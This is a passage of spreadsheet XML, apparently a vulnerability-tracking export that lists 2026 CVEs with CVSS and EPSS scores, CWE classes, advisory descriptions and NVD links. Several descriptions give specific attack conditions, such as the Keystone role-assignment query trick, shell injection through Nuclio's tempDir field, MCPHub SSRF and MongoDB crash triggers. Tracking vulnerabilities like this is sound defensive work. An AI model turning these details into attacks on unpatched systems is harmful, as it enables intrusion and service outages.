          <t>strongSwan 4.5.0 through 6.0.7 has Incorrect Access Control in the eap-ttls and eap-peap plugins because there can be a missing or mismatched inner EAP identity.</t>
        </is>
      </c>
      <c r="M3241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78134</t>
        </is>
      </c>
    </row>
    <row r="3242">
      <c r="A3242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79617</t>
        </is>
      </c>
      <c r="C3242" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3242" s="5" t="inlineStr"/>
      <c r="F3242" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3242" s="5" t="inlineStr"/>
      <c r="H3242" s="5" t="inlineStr"/>
      <c r="I3242" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3242" s="5" t="inlineStr"/>
      <c r="K3242" s="5" t="inlineStr">
        <is>
          <t>CWE-732</t>
        </is>
      </c>
      <c r="L3242" s="5" t="inlineStr">
        <is>
          <t>Incorrect Permission Assignment for Critical Resource vulnerability in TÜBİTAK BİLGEM Software Technologies Research Institute Pardus LightDM Greeter allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Pardus LightDM Greeter: before 0.4.15.</t>
        </is>
      </c>
      <c r="M3242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79617</t>
        </is>
      </c>
    </row>
    <row r="3243">
      <c r="A3243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79745</t>
        </is>
      </c>
      <c r="C3243" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3243" s="5" t="inlineStr"/>
      <c r="F3243" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3243" s="5" t="inlineStr"/>
      <c r="H3243" s="5" t="inlineStr"/>
      <c r="I3243" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3243" s="5" t="inlineStr"/>
      <c r="K3243" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3243" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.32, the built-in prompt and resource controllers perform no role checking. The mutating POST/PUT /api/prompts* and POST/PUT /api/resources* routes are attached to the authenticated router with no admin gate, and the handlers never read req.user. The DAO singletons they write are consulted first — ahead of any connected MCP server — for every session in handleGetPromptRequest / handleReadResourceRequest. A non-admin can therefore create, overwrite, and shadow global prompt templates and resources that all other users are served. The scored impact is the unauthorized integrity violation (creation/tampering/shadowing of globally-served records); stored prompt injection into other users' LLM sessions is a downstream consequence of that tampering. This issue has been patched in version 1.0.32.</t>
        </is>
      </c>
      <c r="M3243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79745</t>
        </is>
      </c>
    </row>
    <row r="3244">
      <c r="A3244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79747</t>
        </is>
      </c>
      <c r="C3244" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3244" s="5" t="inlineStr"/>
      <c r="F3244" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3244" s="5" t="inlineStr"/>
      <c r="H3244" s="5" t="inlineStr"/>
      <c r="I3244" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3244" s="5" t="inlineStr"/>
      <c r="K3244" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3244" s="5" t="inlineStr">
        <is>
          <t>MCPHub is a unified hub for centrally managing and dynamically orchestrating multiple MCP servers/APIs into separate endpoints with flexible routing strategies. Prior to version 1.0.32, an authenticated non-admin user can register a server pointing at an arbitrary URL and make the hub issue server-side requests to it, with no egress filtering (no block of loopback / RFC1918 / link-local 169.254.0.0/16). Via the OpenAPI proxy path the response body is returned to the caller (full, reflected SSRF); via the SSE/streamable-http transport the request is sent blind. This issue has been patched in version 1.0.32.</t>
        </is>
      </c>
      <c r="M3244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79747</t>
        </is>
      </c>
    </row>
    <row r="3245">
      <c r="A3245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79754</t>
        </is>
      </c>
      <c r="C3245" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3245" s="5" t="inlineStr"/>
      <c r="F3245" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3245" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H3245" s="5" t="inlineStr"/>
      <c r="I3245" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3245" s="5" t="inlineStr"/>
      <c r="K3245" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L3245" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. From version 1.6.19 to before version 1.17.2, Nuclio's Dashboard build pipeline does not sanitize the spec.build.tempDir field before using it to construct a shell command. When the Kaniko container builder is enabled, a user with function-create permission can inject shell metacharacters into this field and achieve arbitrary command execution inside the Dashboard container, which runs with a Kubernetes service account holding wildcard access to Secrets, Pods, Jobs, and Deployments in its namespace. This issue has been patched in version 1.17.2.</t>
        </is>
      </c>
      <c r="M3245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79754</t>
        </is>
      </c>
    </row>
    <row r="3246">
      <c r="A3246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79775</t>
        </is>
      </c>
      <c r="C3246" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3246" s="5" t="inlineStr"/>
      <c r="F3246" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3246" s="5" t="inlineStr"/>
      <c r="H3246" s="5" t="inlineStr"/>
      <c r="I3246" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J3246" s="5" t="inlineStr"/>
      <c r="K3246" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="L3246" s="5" t="inlineStr">
        <is>
          <t>rclone versions &gt;= v1.72.0 and &lt;= v1.74.4 (fixed in v1.75.0) contain multiple denial-of-service vulnerabilities in the archive backend's SquashFS parser, which relies on the github.com/diskfs/go-diskfs dependency. The parser fails to validate attacker-controlled superblock and metadata values before use. An attacker who can place or modify a SquashFS image in storage exposed through an rclone :archive: remote can craft a malicious image that triggers an integer division-by-zero panic (zero block size), an out-of-bounds slice panic (out-of-range inode metadata offset), or a non-progress CPU loop (truncated metadata stream). Variants 1 and 2 terminate the rclone process and, via 'rclone serve sftp', can crash the entire SFTP server; variant 3 causes sustained CPU consumption. Parsing is lazy, so a victim or remote client must address or descend into the malicious archive object to trigger it.</t>
        </is>
      </c>
      <c r="M3246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79775</t>
        </is>
      </c>
    </row>
    <row r="3247">
      <c r="A3247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80183</t>
        </is>
      </c>
      <c r="C3247" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3247" s="5" t="inlineStr"/>
      <c r="F3247" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3247" s="5" t="inlineStr"/>
      <c r="H3247" s="5" t="inlineStr"/>
      <c r="I3247" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J3247" s="5" t="inlineStr"/>
      <c r="K3247" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L3247" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Keystone before 29.0.3, any authenticated user holding role:reader on any project can list every project-scoped role assignment under any domain by passing a domain ID as scope.project.id with include_subtree to the GET /v3/role_assignments endpoint. The domain's project record has domain_id=null, causing the policy domain_id check to pass for any caller. With include_names, the response discloses the names and home-domain IDs of every user, group, project, and role involved. The literal "default" domain ID works against any deployment created with keystone-manage bootstrap. An attacker can harvest domain IDs from the response and repeat the query to map role assignments across the entire cloud. This is caused by misuse of "None" in 
list_role_assignments_for_tree.</t>
        </is>
      </c>
      <c r="M3247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80183</t>
        </is>
      </c>
    </row>
    <row r="3248">
      <c r="A3248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80380</t>
        </is>
      </c>
      <c r="C3248" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3248" s="5" t="inlineStr"/>
      <c r="F3248" s="5" t="inlineStr"/>
      <c r="G3248" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H3248" s="5" t="inlineStr"/>
      <c r="I3248" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3248" s="5" t="inlineStr"/>
      <c r="K3248" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L3248" s="5" t="inlineStr">
        <is>
          <t>IBM DataStage on Cloud Pak for Data 5.4.0.0 could allow a remote attacker to perform unauthorized actions due to cross-site request forgery.</t>
        </is>
      </c>
      <c r="M3248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80380</t>
        </is>
      </c>
    </row>
    <row r="3249">
      <c r="A3249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81330</t>
        </is>
      </c>
      <c r="C3249" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3249" s="5" t="inlineStr"/>
      <c r="F3249" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3249" s="5" t="inlineStr"/>
      <c r="H3249" s="5" t="inlineStr"/>
      <c r="I3249" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3249" s="5" t="inlineStr"/>
      <c r="K3249" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="L3249" s="5" t="inlineStr">
        <is>
          <t>The C6 ear camera transmits live video to the EarVision Android application over unencrypted UDP streams. The application manifest permits cleartext traffic, and captured network traffic contains reconstructable JPEG or WEBP video frames transmitted over UDP. An attacker within local wireless range may capture and reconstruct the live video stream without transport encryption.</t>
        </is>
      </c>
      <c r="M3249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81330</t>
        </is>
      </c>
    </row>
    <row r="3250">
      <c r="A3250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81404</t>
        </is>
      </c>
      <c r="C3250" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3250" s="5" t="inlineStr"/>
      <c r="F3250" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3250" s="5" t="inlineStr"/>
      <c r="H3250" s="5" t="inlineStr"/>
      <c r="I3250" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3250" s="5" t="inlineStr"/>
      <c r="K3250" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3250" s="5" t="inlineStr">
        <is>
          <t>The IPGP Visitors Origin WordPress plugin before 1.6 does not sanitise or escape user input before reflecting it back in the HTTP response, allowing unauthenticated attackers to perform Reflected Cross-Site Scripting attacks against users who are tricked into submitting a crafted request.</t>
        </is>
      </c>
      <c r="M3250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81404</t>
        </is>
      </c>
    </row>
    <row r="3251">
      <c r="A3251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81781</t>
        </is>
      </c>
      <c r="C3251" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3251" s="5" t="inlineStr"/>
      <c r="F3251" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3251" s="5" t="inlineStr"/>
      <c r="H3251" s="5" t="inlineStr"/>
      <c r="I3251" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3251" s="5" t="inlineStr"/>
      <c r="K3251" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3251" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization vulnerability in Unbounce Unbounce Landing Pages unbounce allows Exploiting Incorrectly Configured Access Control Security Levels.
This issue affects Unbounce Landing Pages: from n/a through 1.1.4.</t>
        </is>
      </c>
      <c r="M3251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81781</t>
        </is>
      </c>
    </row>
    <row r="3252">
      <c r="A3252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81783</t>
        </is>
      </c>
      <c r="C3252" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3252" s="5" t="inlineStr"/>
      <c r="F3252" s="5" t="inlineStr"/>
      <c r="G3252" s="5" t="inlineStr"/>
      <c r="H3252" s="5" t="inlineStr"/>
      <c r="I3252" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3252" s="5" t="inlineStr"/>
      <c r="K3252" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L3252" s="5" t="inlineStr">
        <is>
          <t>Subscriber Broken Authentication in MailMunch – Grow your Email List &lt;= 3.2.5 versions.</t>
        </is>
      </c>
      <c r="M3252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81783</t>
        </is>
      </c>
    </row>
    <row r="3253">
      <c r="A3253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81795</t>
        </is>
      </c>
      <c r="C3253" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3253" s="5" t="inlineStr"/>
      <c r="F3253" s="5" t="inlineStr"/>
      <c r="G3253" s="5" t="inlineStr"/>
      <c r="H3253" s="5" t="inlineStr"/>
      <c r="I3253" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3253" s="5" t="inlineStr"/>
      <c r="K3253" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3253" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Cross Site Scripting (XSS) in Page Visits Counter &amp;#8211; Lite &lt;= 1.2.3 versions.</t>
        </is>
      </c>
      <c r="M3253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81795</t>
        </is>
      </c>
    </row>
    <row r="3254">
      <c r="A3254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81798</t>
        </is>
      </c>
      <c r="C3254" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3254" s="5" t="inlineStr"/>
      <c r="F3254" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3254" s="5" t="inlineStr"/>
      <c r="H3254" s="5" t="inlineStr"/>
      <c r="I3254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3254" s="5" t="inlineStr"/>
      <c r="K3254" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3254" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Easy Appointments allows DOM-Based XSS.
This issue affects Easy Appointments: from n/a through 4.0.2.1.</t>
        </is>
      </c>
      <c r="M3254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81798</t>
        </is>
      </c>
    </row>
    <row r="3255">
      <c r="A3255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82052</t>
        </is>
      </c>
      <c r="C3255" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3255" s="5" t="inlineStr"/>
      <c r="F3255" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3255" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3255" s="5" t="inlineStr"/>
      <c r="I3255" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3255" s="5" t="inlineStr"/>
      <c r="K3255" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L3255" s="5" t="inlineStr">
        <is>
          <t>The $regexFindAll expression can be used by an authenticated user who can run aggregation pipeline stages to crash a MongoDB server (mongod). Under certain specific conditions the  regex match can start in the middle of a multi-code-unit character, triggering an assertion during query execution.</t>
        </is>
      </c>
      <c r="M3255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82052</t>
        </is>
      </c>
    </row>
    <row r="3256">
      <c r="A3256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82054</t>
        </is>
      </c>
      <c r="C3256" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3256" s="5" t="inlineStr"/>
      <c r="F3256" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3256" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3256" s="5" t="inlineStr"/>
      <c r="I3256" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3256" s="5" t="inlineStr"/>
      <c r="K3256" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3256" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB server's JSON Pointer parser used during $jsonSchema query filter processing. When a find command includes a specially crafted $jsonSchema filter field, the parser processes the input without enforcing adequate limits on iteration count or total allocation size, resulting in significant memory amplification. Under concurrent request load, the cumulative memory consumption can exhaust available heap memory, causing the server's out-of-memory handler to terminate the mongod process and deny service to all connected clients.</t>
        </is>
      </c>
      <c r="M3256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82054</t>
        </is>
      </c>
    </row>
    <row r="3257">
      <c r="A3257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82055</t>
        </is>
      </c>
      <c r="C3257" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3257" s="5" t="inlineStr"/>
      <c r="F3257" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3257" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3257" s="5" t="inlineStr"/>
      <c r="I3257" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3257" s="5" t="inlineStr"/>
      <c r="K3257" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L3257" s="5" t="inlineStr">
        <is>
          <t>A security issue exists in MongoDB's 2dsphere index key generation that can cause a server crash due to a null pointer dereference. When a specially crafted GeoJSON document is inserted into a collection with a 2dsphere index, an inconsistency in geometry parsing can leave an internal object in an invalid, partially initialized state. During subsequent index key generation, access to this improperly initialized object results in a null pointer dereference that terminates the mongod process. An authenticated user with write access can use this to cause a denial of service.</t>
        </is>
      </c>
      <c r="M3257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82055</t>
        </is>
      </c>
    </row>
    <row r="3258">
      <c r="A3258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82057</t>
        </is>
      </c>
      <c r="C3258" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3258" s="5" t="inlineStr"/>
      <c r="F3258" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3258" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3258" s="5" t="inlineStr"/>
      <c r="I3258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3258" s="5" t="inlineStr"/>
      <c r="K3258" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L3258" s="5" t="inlineStr">
        <is>
          <t>A security issue was discovered in MongoDB where an authenticated user with readWrite privileges could crash the mongod server process. By specifying a custom WiredTiger storage configuration option with an incompatible value during collection creation, a user could cause a type confusion in the storage engine layer. When documents were subsequently read from the misconfigured collection, the resulting mismatch in expected data format led to corrupted memory interpretation and a server crash. The crafted collection configuration persists across restarts, requiring manual operator intervention to remediate.</t>
        </is>
      </c>
      <c r="M3258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82057</t>
        </is>
      </c>
    </row>
    <row r="3259">
      <c r="A3259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82058</t>
        </is>
      </c>
      <c r="C3259" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3259" s="5" t="inlineStr"/>
      <c r="F3259" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3259" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3259" s="5" t="inlineStr"/>
      <c r="I3259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3259" s="5" t="inlineStr"/>
      <c r="K3259" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="L3259" s="5" t="inlineStr">
        <is>
          <t>A flaw in MongoDB's JSON Schema validation error generation code allows an authenticated user with readWrite privileges to crash the mongod server. When a BSON document containing an array with a malformed numeric field name fails a $jsonSchema items type constraint, the error generation path performs unsafe numeric conversion on the user-controlled field name without proper exception handling, resulting in an uncaught exception that terminates the server process. This is possible because incoming wire protocol BSON validation does not enforce that array element field names are valid, in-range numeric indices.</t>
        </is>
      </c>
      <c r="M3259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82058</t>
        </is>
      </c>
    </row>
    <row r="3260">
      <c r="A3260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82065</t>
        </is>
      </c>
      <c r="C3260" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3260" s="5" t="inlineStr"/>
      <c r="F3260" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3260" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3260" s="5" t="inlineStr"/>
      <c r="I3260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3260" s="5" t="inlineStr"/>
      <c r="K3260" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L3260" s="5" t="inlineStr">
        <is>
          <t>A security issue in the MongoDB Server's storage engine integration layer allows an authenticated user with collection creation privileges to cause a persistent denial of service. Insufficient validation of user-supplied storage configuration options permits values that, once persisted to durable metadata, trigger a fatal assertion failure when the metadata is subsequently read by diagnostic operations. The corrupted metadata persists across server restarts and is replicated to other cluster members, requiring manual operator intervention to restore service.</t>
        </is>
      </c>
      <c r="M3260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82065</t>
        </is>
      </c>
    </row>
    <row r="3261">
      <c r="A3261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82068</t>
        </is>
      </c>
      <c r="C3261" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3261" s="5" t="inlineStr"/>
      <c r="F3261" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3261" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3261" s="5" t="inlineStr"/>
      <c r="I3261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3261" s="5" t="inlineStr"/>
      <c r="K3261" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L3261" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server allows an authenticated user with write privileges to trigger a persistent fatal assertion crash by sending specially crafted retryable write commands. The crash state is durably persisted, causing the server process to repeatedly crash on restart and potentially propagating to additional nodes in a sharded cluster. Manual intervention is required to restore service availability.</t>
        </is>
      </c>
      <c r="M3261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82068</t>
        </is>
      </c>
    </row>
    <row r="3262">
      <c r="A3262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82070</t>
        </is>
      </c>
      <c r="C3262" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3262" s="5" t="inlineStr"/>
      <c r="F3262" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3262" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3262" s="5" t="inlineStr"/>
      <c r="I3262" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3262" s="5" t="inlineStr"/>
      <c r="K3262" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L3262" s="5" t="inlineStr">
        <is>
